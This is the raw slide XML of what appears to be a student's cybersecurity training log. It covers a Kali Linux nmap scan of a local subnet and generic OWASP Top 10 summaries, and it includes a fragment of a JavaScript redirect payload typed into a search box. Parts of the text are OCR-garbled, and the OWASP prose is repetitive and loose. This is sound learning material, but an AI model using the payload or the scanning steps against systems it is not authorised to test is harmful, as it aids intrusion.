              <a:rPr lang="en-US" sz="500" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3D3F44"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>.jj</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25609" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25921965-61D1-15DD-03BA-5AD4BBE7998C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="6924675"/>
            <a:ext cx="2530475"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838"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3D3F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ategories </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="495560"/>
                </a:solidFill>
              </a:rPr>
              <a:t>artists disclaimer your cart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3D3F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25610" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C311BFE-3220-A283-D66E-92BB9FAE7138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1725613" y="7181850"/>
            <a:ext cx="33766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a:solidFill>
                  <a:srgbClr val="2B475F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>searched </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="2B475F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>for: &gt;windows.location='http://127</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25611" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02B741FA-D48C-0BFE-E47B-3DC575C674B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="7600950"/>
            <a:ext cx="506413"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00" b="1">
                <a:solidFill>
                  <a:srgbClr val="272932"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ategories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5" name="arrow.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30F19E-BCE7-815A-E20A-25B31797983A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3424238" y="990600"/>
            <a:ext cx="923925" cy="252413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" spc="-50" dirty="0">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>DAY -6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89700B96-A687-97B5-2C9C-4CF4ADDF8F4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="1576388"/>
            <a:ext cx="5813425" cy="741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15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050"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>Nmap checking connected devices to our</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1675"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Open kali linux </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Open terminal and Update sudo apt packages </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -3 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Sudo su</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> Step -4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Enter password </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -5 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Enter cmnd Apt update It updates packages </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -6 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Enter cmnd Apt upgrade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8BCB0984-3596-7D03-24AF-ED5849D92634}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="954088"/>
            <a:ext cx="5837238"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packages are upgraded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>step -7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Enter command Nmap -Pn 192.168.0.0/24 To scan connected devices to our network @kali)-[-]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>nmap 192.168.0.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="2100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Starting Nmap 7.94 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://nmap.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> ) at 2023-07-18 14:34 IST Nmap done: 256 IP addresses (0 hosts up) scanned in 105.08 seconds nected devices to our network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23CD7971-1DDD-39BE-51C9-92F383047CBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="944563" y="5532438"/>
            <a:ext cx="4121150" cy="871537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="121316"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" b="1">
                <a:solidFill>
                  <a:srgbClr val="4F9A40"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>r— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" b="1">
                <a:solidFill>
                  <a:srgbClr val="95B5E1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vip*rpiUt«kali)-M</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="7B96D7"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>*-* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="57A6AF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>nup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="51C93E"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>192.168.0.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="420"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="4F9A40"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Starting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="51C93E"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Map 7.94 ( http*://niup.org ) at 2023*97-18 14:34 IST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="4F9A40"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Nup dona: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="51C93E"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>2S6 IP addrossas (0 host* up) scanned In 105.08 seconds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="50694C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>r— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="7B96D7"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>viparpilote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="95B5E1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="4F9A40"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a: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4" name="arrow.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B36223-883C-3790-1017-3A434683A28A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3432175" y="1000125"/>
            <a:ext cx="923925" cy="246063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" spc="-50">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>DAY -7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBF2ACBC-C561-756F-CD8C-49E0183F612D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="935038" y="1576388"/>
            <a:ext cx="5903912"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5038"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>Owasp to 10 vulnerabilities understanding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28676" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C800CB5-D814-12D2-67BC-4B135073F97E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2365375" y="2755900"/>
            <a:ext cx="30511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5038"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="5038"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>Broken Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28677" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60BB6FEB-7F10-4A67-A612-547478E6E5F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="3902075"/>
            <a:ext cx="5949950" cy="51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5038"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="625"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Broken Access Control is a type of cyber attack that exploits vulnerabilities in a web application's access control mechanisms. It can allow attackers to gain unauthorized access to sensitive data or functionality. Broken Access Control can be caused by a lack of input validation, poor session management, or insufficient authorization checks. To prevent Broken Access Control attacks, developers should implement proper access controls, enforce strong authentication and authorization policies, and regularly test their applications for vulnerabilities. Attackers can use Broken Access Control to steal sensitive data, modify or delete data, or take control of an application. Broken Access Control can be prevented by using strong passwords, implementing multi-factor authentication, and regularly updating software and security systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Attackers can exploit broken access control to steal sensitive data, modify or delete data, or take control of an application. Broken access control can be prevented by implementing proper access controls, using secure network protocols, and following best practices for secure coding. Developers should ensure that only authorized users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7F2CFB8B-C5B3-CB78-48B7-19A65DA2CA99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="901700" y="950913"/>
            <a:ext cx="59467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Aft>
                <a:spcPts val="3363"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>have access to sensitive data and functionality. Other measures include implementing role-based access control, using encryption, and using secure session management techniques. Developers should also ensure that access controls are properly tested and monitored to detect any vulnerabilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C06270-9A58-5D51-A14E-2EF344344592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2368550" y="2947988"/>
            <a:ext cx="30384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3363"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3988"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>Cryptographic failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29700" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8749DA7-076F-D315-EA22-F523A94DDCB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="3919538"/>
            <a:ext cx="5913438" cy="39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3988"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Cryptographic failure is a type of security vulnerability that occurs when encryption and decryption mechanisms are not implemented correctly. Cryptographic failure can be caused by weak encryption algorithms, improper key management, or flawed implementation of encryption protocols. Cryptographic failure can lead to data breaches, identity theft, and other types of cyber attacks. To prevent cryptographic failure, developers should use strong encryption algorithms, implement secure key management, and follow best practices for encryption implementation. Attackers can exploit cryptographic failure to decrypt sensitive data, impersonate legitimate users, or execute other types of cyber attacks. Cryptographic failure can be prevented by using strong encryption algorithms, implementing secure key management, and regularly updating software and security systems.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C0ECECAD-DFA1-63ED-D3C0-9208E60B1324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3292475" y="1404938"/>
            <a:ext cx="11969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4825"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D30FA16F-6607-B7A2-324F-55C2B89DCEE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="2541588"/>
            <a:ext cx="596265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4825"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3363"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Injection is a type of cyber attack that involves the insertion of malicious code into a web application. Injection attacks can be used to steal sensitive data, modify or delete data, or take control of an application. Common types of injection attacks include SQL injection, cross-site scripting (XSS) attacks, and command injection. To prevent injection attacks, developers should use input validation, parameterized queries, and other security measures. Attackers can use injection attacks to steal sensitive data, modify or delete data, or take control of an application. Injection attacks can be prevented by using secure coding practices, regularly testing applications for vulnerabilities, and implementing security protocols.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30724" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C99FCCD-0981-68EE-1DB2-9E6221AE942E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2809875" y="6261100"/>
            <a:ext cx="21526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3363"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3988"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>insecure Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30725" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF5A42B2-37FD-C6BE-B581-32A72057DFDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="7223125"/>
            <a:ext cx="5926138"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3988"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Insecure design is a type of security vulnerability that occurs when a web application is designed with security flaws. Insecure design can be caused by poor software architecture, lack of security controls, or failure to follow best practices for secure design. Insecure design can lead to data breaches, identity theft, and other types of cyber attacks. To prevent insecure design, developers should follow secure design</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F1C66C54-7B78-713F-C838-44C642B38778}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="954088"/>
            <a:ext cx="5903913"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Aft>
                <a:spcPts val="5675"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit insecure design to steal sensitive data, modify or delete data, or take control of an application. Insecure design can be prevented by using secure coding practices, following best practices for secure design, and regularly updating software and security systems.</a:t>
            </a:r>
          </a:p>
